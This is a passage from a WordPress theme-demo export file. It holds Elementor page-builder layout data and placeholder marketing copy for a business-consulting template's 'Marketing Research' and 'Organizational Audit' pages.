		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[869]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"317e6d4","elType":"section","settings":{"gap":"extended","structure":"20","padding":{"unit":"px","top":"90","right":"0","bottom":"190","left":"0","isLinked":false},"padding_tablet":{"unit":"px","top":"90","right":"0","bottom":"90","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false},"reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"efbeefb","elType":"column","settings":{"_column_size":50,"_inline_size":75,"_inline_size_tablet":100},"elements":[{"id":"f82bab9","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/service-box1.jpg","id":902},"image_size":"full","image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"_padding":{"unit":"px","top":"0","right":"0","bottom":"42","left":"0","isLinked":false}},"elements":[],"widgetType":"image"},{"id":"d516166","elType":"widget","settings":{"title":"We Conduct Marketing Research","header_size":"h3","_padding":{"unit":"px","top":"0","right":"0","bottom":"22","left":"0","isLinked":false},"typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]}},"elements":[],"widgetType":"heading"},{"id":"611317c","elType":"widget","settings":{"editor":"<p>It\u2019s a daunting challenge: How do you move forward at speed despite enormous uncertainty? Radar Strategy provides the answer. Our unique \"Today Forward, Future Back\" approach enables you to create value now as you move toward your future vision, with the flexibility to adapt as scenarios change. We\u2019ll help you make critical choices and choreograph your transformation journey as you bring your core to full potential and build new growth engines.<\/p><p>Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks: an outside-in approach that puts customers first, a uniquely great customer experience and internal capabilities that ensure you deliver optimal customer interactions at every touchpoint.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"9a4f025","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"35a9e19","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"34206bb","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"bar_color":"#52C5B6"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"04ace53","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"1ce0cf2","elType":"widget","settings":{"bar_style":"circle","title":"business innovation\n","percent":{"unit":"%","size":65,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"bar_color":"#52C5B6"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"725e97b","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"d809972","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"bar_color":"#52C5B6"},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"5d64ec6","elType":"section","settings":{"background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg1-service-detail.jpg","id":935},"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","padding":{"unit":"px","top":"40","right":"0","bottom":"40","left":"0","isLinked":false},"border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"margin":{"unit":"px","top":"0","right":0,"bottom":"65","left":0,"isLinked":false},"margin_mobile":{"unit":"px","top":"0","right":0,"bottom":"50","left":0,"isLinked":false}},"elements":[{"id":"19280c6","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"7205aed","elType":"widget","settings":{"editor":"<h3>We are Always Ready to Assist Our Clients<\/h3><p>developing financial processes and procedures<\/p>","text_color":"#FFFFFF","typography_font_family":"Raleway","typography_font_weight":"400","_padding":{"unit":"px","top":"28","right":"0","bottom":"25","left":"50","isLinked":false},"_border_border":"solid","_border_width":{"unit":"px","top":"0","right":"0","bottom":"0","left":"5","isLinked":false},"_border_color":"#52C5B6","_margin":{"unit":"px","top":"0","right":"-15","bottom":"0","left":"-15","isLinked":false},"_css_classes":"section-baner","typography_typography":"custom","typography_font_size_mobile":{"unit":"px","size":14,"sizes":[]}},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true},{"id":"84e6cfd","elType":"widget","settings":{"title":"How It Works & How We Do It","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"25b91f9","elType":"widget","settings":{"editor":"<p>Our specialists are ready to provide an analysis of both the market as a whole and its individual components (competitors, consumers, product, etc.), using practical methods and starting from your research goals.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"9d81515","elType":"widget","settings":{"icon_list":[{"text":"<span style=\"color:#262832; font-weight:600;\">the organization is just beginning to operate<\/span> in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b098382"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Customer-focused businesses build a virtuous cycle we call the \"customer wheel.\" We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"7ebdebe"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Align your marketing  and brand strategy with overarching business objectives. We help you combine hard metrics with creative.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"ab8f838"}],"space_between":{"unit":"px","size":17,"sizes":[]},"icon_color":"#52C5B6","icon_size":{"unit":"px","size":6,"sizes":[]},"text_indent":{"unit":"px","size":14,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"19","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"42baa2b","elType":"section","settings":{"gap":"extended","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"10","right":"10","bottom":"10","left":"10","isLinked":true},"margin":{"unit":"px","top":"0","right":0,"bottom":"65","left":0,"isLinked":false},"margin_mobile":{"unit":"px","top":"0","right":0,"bottom":"40","left":0,"isLinked":false},"padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"3ee3642","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"5b13621","elType":"widget","settings":{"editor":"<blockquote>\u201cI cannot give you the formula for success, but I can give you the \nformula for failure. It is: Try to please everybody.\u201d\n<cite>david oswald<\/cite><\/blockquote>","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding":{"unit":"px","top":"0","right":"90","bottom":"0","left":"90","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"15","bottom":"0","left":"15","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true},{"id":"8317533","elType":"widget","settings":{"title":"Business Planning & Strategy","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"38","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"c212bb7","elType":"section","settings":{"gap":"extended","structure":"20","layout":"full_width"},"elements":[{"id":"47aaa4f","elType":"column","settings":{"_column_size":50,"_inline_size":55},"elements":[{"id":"72dea83","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart1-service-home5.png","id":2372},"image_size":"full","width":{"unit":"%","size":100,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true},{"id":"fe0af4f","elType":"column","settings":{"_column_size":50,"_inline_size":45},"elements":[{"id":"c0a1253","elType":"widget","settings":{"editor":"Nurture promoters, your loyal customers who are more profitable and will advocate for your business\u2014both in good times and bad.\n\nCustomer-focused businesses build a virtuous cycle we call the <span style=\"color: #52c5b6;\">\"customer wheel.\"<\/span> We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization. Identify quick, targeted customized solutions and operational improvements."},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false},{"id":"94af6c9","elType":"column","settings":{"_column_size":50,"_inline_size":25,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"4e4cb68","elType":"widget","settings":{"title":"Services","header_size":"h5","typography_font_family":"Roboto","typography_font_weight":"600"},"elements":[],"widgetType":"heading"},{"id":"1ebc8a8","elType":"section","settings":{"layout":"full_width","gap":"no","structure":"20"},"elements":[{"id":"3d2f32e","elType":"column","settings":{"_column_size":50,"_inline_size":78,"_inline_size_mobile":78},"elements":[{"id":"83881c6","elType":"widget","settings":{"text":"Divider","color":"#00000026","gap":{"unit":"px","size":20,"sizes":[]},"_css_classes":"widget-title"},"elements":[],"widgetType":"divider"}],"isInner":true},{"id":"fcdefbb","elType":"column","settings":{"_column_size":50,"_inline_size":22,"_inline_size_mobile":22},"elements":[{"id":"82d1d05","elType":"widget","settings":{"text":"Divider","color":"#52C5B6","weight":{"unit":"px","size":3,"sizes":[]},"gap":{"unit":"px","size":21,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"17","isLinked":false}},"elements":[],"widgetType":"divider"}],"isInner":true}],"isInner":true},{"id":"2301f15","elType":"widget","settings":{"icon_list":[{"text":"marketing research","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"c162572","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/marketing-research","is_external":"","nofollow":"","custom_attributes":""}},{"text":"Organizational Audit","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b64d52f","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/organizational-audit\/","is_external":"","nofollow":"","custom_attributes":""}},{"text":"business consulting","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"884375d","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/business-consulting","is_external":"","nofollow":"","custom_attributes":""}},{"text":"project management","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"2f35702","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/project-management\/","is_external":"","nofollow":"","custom_attributes":""}},{"text":"support functions","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"6aee619","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/support-function\/","is_external":"","nofollow":"","custom_attributes":""}},{"text":"finance planning","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"cd97531","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/finance-planning\/","is_external":"","nofollow":"","custom_attributes":""}}],"space_between":{"unit":"px","size":15,"sizes":[]},"icon_color":"#52C5B6","icon_size":{"unit":"px","size":6,"sizes":[]},"text_color":"#1B1D21","text_color_hover":"#52C5B6","text_indent":{"unit":"px","size":10,"sizes":[]},"icon_typography_typography":"custom","icon_typography_font_family":"Inter","icon_typography_font_size":{"unit":"px","size":13,"sizes":[]},"icon_typography_font_weight":"600","icon_typography_text_transform":"uppercase","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"86a5b1b","elType":"widget","settings":{"title":"Contacts","header_size":"h5"},"elements":[],"widgetType":"heading"},{"id":"cb92309","elType":"section","settings":{"layout":"full_width","gap":"no","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"5","left":"0","isLinked":false}},"elements":[{"id":"2b9345c","elType":"column","settings":{"_column_size":50,"_inline_size":78,"_inline_size_mobile":78},"elements":[{"id":"798f2b3","elType":"widget","settings":{"text":"Divider","color":"#00000026","gap":{"unit":"px","size":20,"sizes":[]},"_css_classes":"widget-title"},"elements":[],"widgetType":"divider"}],"isInner":true},{"id":"46c4dc2","elType":"column","settings":{"_column_size":50,"_inline_size":22,"_inline_size_mobile":22},"elements":[{"id":"a5a16d3","elType":"widget","settings":{"text":"Divider","color":"#52C5B6","weight":{"unit":"px","size":3,"sizes":[]},"gap":{"unit":"px","size":21,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"17","isLinked":false}},"elements":[],"widgetType":"divider"}],"isInner":true}],"isInner":true},{"id":"e084289","elType":"widget","settings":{"title_text":"Visit Us Daily","description_text":"411 University St, Seattle","position":"left","title_size":"h6","primary_color":"#52C5B6","icon_size":{"unit":"px","size":18,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"bold","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"400","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/pin.svg","id":347},"library":"svg"},"title_color":"#1B1D21","title_typography_font_family":"Raleway","description_color":"#5F5F5F","description_typography_font_family":"Open Sans","_margin":{"unit":"px","top":"0","right":"0","bottom":"16","left":"0","isLinked":false},"icon_space":{"unit":"px","size":20,"sizes":[]},"text_align_mobile":"left","icon_space_mobile":{"unit":"px","size":5,"sizes":[]},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-box"},{"id":"b3e48c6","elType":"widget","settings":{"title_text":"Have Any Questions?","description_text":"+1-800-456-478-23","position":"left","title_size":"h6","primary_color":"#52C5B6","icon_size":{"unit":"px","size":18,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"bold","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"400","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/call.svg","id":345},"library":"svg"},"title_color":"#1B1D21","title_typography_font_family":"Raleway","description_color":"#5F5F5F","description_typography_font_family":"Open Sans","_margin":{"unit":"px","top":"0","right":"0","bottom":"16","left":"0","isLinked":false},"icon_space":{"unit":"px","size":20,"sizes":[]},"text_align_mobile":"left","link":{"url":"tel:+1-800-456-478-23","is_external":"","nofollow":"","custom_attributes":""},"icon_space_mobile":{"unit":"px","size":5,"sizes":[]},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-box"},{"id":"492df2b","elType":"widget","settings":{"title_text":"Mail Us","description_text":"maxbizz@mail.com","position":"left","title_size":"h6","primary_color":"#52C5B6","icon_size":{"unit":"px","size":18,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"bold","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"400","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/send.svg","id":374},"library":"svg"},"title_color":"#1B1D21","title_typography_font_family":"Raleway","description_color":"#5F5F5F","description_typography_font_family":"Open Sans","icon_space":{"unit":"px","size":20,"sizes":[]},"text_align_mobile":"left","link":{"url":"mailto:maxbizz@mail.com","is_external":"","nofollow":"","custom_attributes":""},"icon_space_mobile":{"unit":"px","size":5,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-box"},{"id":"d978f37","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/img-btn-pdf-home5.jpg","id":2373},"image_size":"full","align":"left","link_to":"custom","link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"607ad14","elType":"section","settings":{"content_width":{"unit":"px","size":1370,"sizes":[]},"margin":{"unit":"px","top":"-75","right":0,"bottom":"-75","left":0,"isLinked":false},"margin_tablet":{"unit":"px","top":"-20","right":0,"bottom":"-75","left":0,"isLinked":false},"z_index":1,"margin_mobile":{"unit":"px","top":"-60","right":0,"bottom":"60","left":0,"isLinked":false}},"elements":[{"id":"4d39ba4","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"2cd2c00","elType":"section","settings":{"content_position":"middle","structure":"20","background_background":"classic","background_color":"#52C5B6","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"box_shadow_box_shadow_type":"yes","box_shadow_box_shadow":{"horizontal":8,"vertical":8,"blur":30,"spread":0,"color":"rgba(0, 0, 0, 0.12)"},"padding":{"unit":"px","top":"50","right":"45","bottom":"50","left":"45","isLinked":false},"margin_tablet":{"unit":"px","top":"0","right":0,"bottom":"0","left":0,"isLinked":false},"padding_mobile":{"unit":"px","top":"40","right":"20","bottom":"40","left":"20","isLinked":false}},"elements":[{"id":"fb8eeb3","elType":"column","settings":{"_column_size":50,"_inline_size":30,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[{"id":"ce1ce83","elType":"widget","settings":{"title":"Ready to Get Started?","header_size":"h4","title_color":"#FFFFFF","typography_font_weight":"600","typography_font_size_mobile":{"unit":"px","size":22,"sizes":[]}},"elements":[],"widgetType":"heading"}],"isInner":true},{"id":"5f4372d","elType":"column","settings":{"_column_size":50,"_inline_size":70,"_inline_size_tablet":100},"elements":[{"id":"aea2a87","elType":"widget","settings":{"cf7":"741","_background_background":"classic","_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"_border_radius_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"css_responce":"color:#fff;"},"elements":[],"widgetType":"ictf7"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:10:{s:5:"image";a:3:{s:5:"count";i:3;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:5:{s:5:"image";i:3;s:10:"image_size";i:3;s:5:"align";i:1;s:7:"link_to";i:1;s:4:"link";i:1;}}s:5:"style";a:1:{s:19:"section_style_image";a:2:{s:19:"image_border_radius";i:2;s:5:"width";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:1;s:15:"_padding_mobile";i:1;}}}}s:7:"heading";a:3:{s:5:"count";i:6;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:6;s:11:"header_size";i:6;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:3;}}s:5:"style";a:1:{s:19:"section_title_style";a:4:{s:27:"typography_font_size_mobile";i:2;s:22:"typography_font_family";i:1;s:22:"typography_font_weight";i:2;s:11:"title_color";i:1;}}}}s:11:"text-editor";a:3:{s:5:"count";i:5;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:5;}}s:8:"advanced";a:2:{s:14:"_section_style";a:4:{s:8:"_padding";i:4;s:15:"_padding_mobile";i:2;s:7:"_margin";i:2;s:12:"_css_classes";i:1;}s:15:"_section_border";a:3:{s:14:"_border_border";i:1;s:13:"_border_width";i:1;s:13:"_border_color";i:1;}}s:5:"style";a:1:{s:13:"section_style";a:5:{s:10:"text_color";i:1;s:22:"typography_font_family";i:1;s:22:"typography_font_weight";i:1;s:21:"typography_typography";i:1;s:27:"typography_font_size_mobile";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:3;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:3;s:5:"title";i:3;s:7:"percent";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:15:"_padding_mobile";i:2;}}s:5:"style";a:1:{s:17:"bar_style_section";a:1:{s:9:"bar_color";i:3;}}}}s:6:"column";a:3:{s:5:"count";i:16;s:15:"control_percent";i:0;s:8:"controls";a:2:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:16;s:19:"_inline_size_tablet";i:4;s:19:"_inline_size_mobile";i:4;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:1:{s:13:"margin_tablet";i:2;}}}}s:7:"section";a:3:{s:5:"count";i:9;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:4:{s:3:"gap";i:6;s:6:"layout";i:5;s:16:"content_position";i:1;s:13:"content_width";i:1;}s:17:"section_structure";a:1:{s:9:"structure";i:6;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:7:{s:7:"padding";i:6;s:14:"padding_mobile";i:3;s:6:"margin";i:3;s:13:"margin_mobile";i:3;s:14:"padding_tablet";i:1;s:13:"margin_tablet";i:2;s:7:"z_index";i:1;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}s:5:"style";a:2:{s:18:"section_background";a:6:{s:21:"background_background";i:3;s:16:"background_image";i:1;s:19:"background_position";i:1;s:17:"background_repeat";i:1;s:15:"background_size";i:1;s:16:"background_color";i:2;}s:14:"section_border";a:3:{s:13:"border_radius";i:3;s:26:"box_shadow_box_shadow_type";i:1;s:21:"box_shadow_box_shadow";i:1;}}}}s:9:"icon-list";a:3:{s:5:"count";i:2;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:2;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:2;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:2;s:9:"icon_size";i:2;}s:18:"section_text_style";a:8:{s:11:"text_indent";i:2;s:10:"text_color";i:1;s:16:"text_color_hover";i:1;s:26:"icon_typography_typography";i:1;s:27:"icon_typography_font_family";i:1;s:25:"icon_typography_font_size";i:1;s:27:"icon_typography_font_weight";i:1;s:30:"icon_typography_text_transform";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:2;}}}}s:7:"divider";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:5:"style";a:1:{s:21:"section_divider_style";a:3:{s:5:"color";i:4;s:3:"gap";i:4;s:6:"weight";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:12:"_css_classes";i:2;s:7:"_margin";i:2;}}}}s:8:"icon-box";a:3:{s:5:"count";i:3;s:15:"control_percent";i:9;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:6:{s:10:"title_text";i:3;s:16:"description_text";i:3;s:8:"position";i:3;s:10:"title_size";i:3;s:13:"selected_icon";i:3;s:4:"link";i:2;}}s:5:"style";a:2:{s:18:"section_style_icon";a:5:{s:13:"primary_color";i:3;s:9:"icon_size";i:3;s:6:"rotate";i:3;s:10:"icon_space";i:3;s:17:"icon_space_mobile";i:3;}s:21:"section_style_content";a:12:{s:18:"title_bottom_space";i:3;s:27:"title_typography_typography";i:3;s:26:"title_typography_font_size";i:3;s:28:"title_typography_font_weight";i:3;s:33:"description_typography_typography";i:3;s:32:"description_typography_font_size";i:3;s:34:"description_typography_font_weight";i:3;s:11:"title_color";i:3;s:28:"title_typography_font_family";i:3;s:17:"description_color";i:3;s:34:"description_typography_font_family";i:3;s:17:"text_align_mobile";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:7:"_margin";i:3;s:14:"_margin_mobile";i:2;}}}}s:5:"ictf7";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"section_content";a:1:{s:3:"cf7";i:1;}}s:8:"advanced";a:2:{s:19:"_section_background";a:1:{s:22:"_background_background";i:1;}s:15:"_section_border";a:2:{s:14:"_border_radius";i:1;s:21:"_border_radius_tablet";i:1;}}s:5:"style";a:1:{s:13:"section_style";a:1:{s:12:"css_responce";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Organizational Audit</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/our-services/organizational-audit/</link>
		<pubDate>Thu, 17 Sep 2020 04:03:11 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=959</guid>
		<description></description>
		<content:encoded><![CDATA[<h6>how we help</h6>		
			<h1>Align Costs with Strategy & Focus on Growth</h1>		
			<a href="#">get in touch</a>
	        main principles	        <h3>Global Reach with Local  Understanding</h3>	    
				In what areas do you provide management consulting? 
					<p>Our associate consultants specialize in a range of business areas. These include strategic planning, issues resolution, culture assessment, board effectiveness, retention.</p>				
				In which countries do you provide consulting services? 
					<p>Our associate consultants specialize in a range of business areas. These include strategic planning, issues resolution, culture assessment, board effectiveness, retention.</p>				
				How is a consulting project started and organized? 
					<p>Our associate consultants specialize in a range of business areas. These include strategic planning, issues resolution, culture assessment, board effectiveness, retention.</p>				
										<img width="606" height="342" src="https://maxbizz.s3.amazonaws.com/images/chart-values-home-5.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart-values-home-5.png 606w, https://maxbizz.s3.amazonaws.com/images/chart-values-home-5-300x169.png 300w" sizes="(max-width: 606px) 100vw, 606px" />											
	        our benefits	        <h3>Why Clients Choose Us</h3>	    
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 511.999 511.999" style="enable-background:new 0 0 511.999 511.999;" xml:space="preserve">
<g>
	<g>
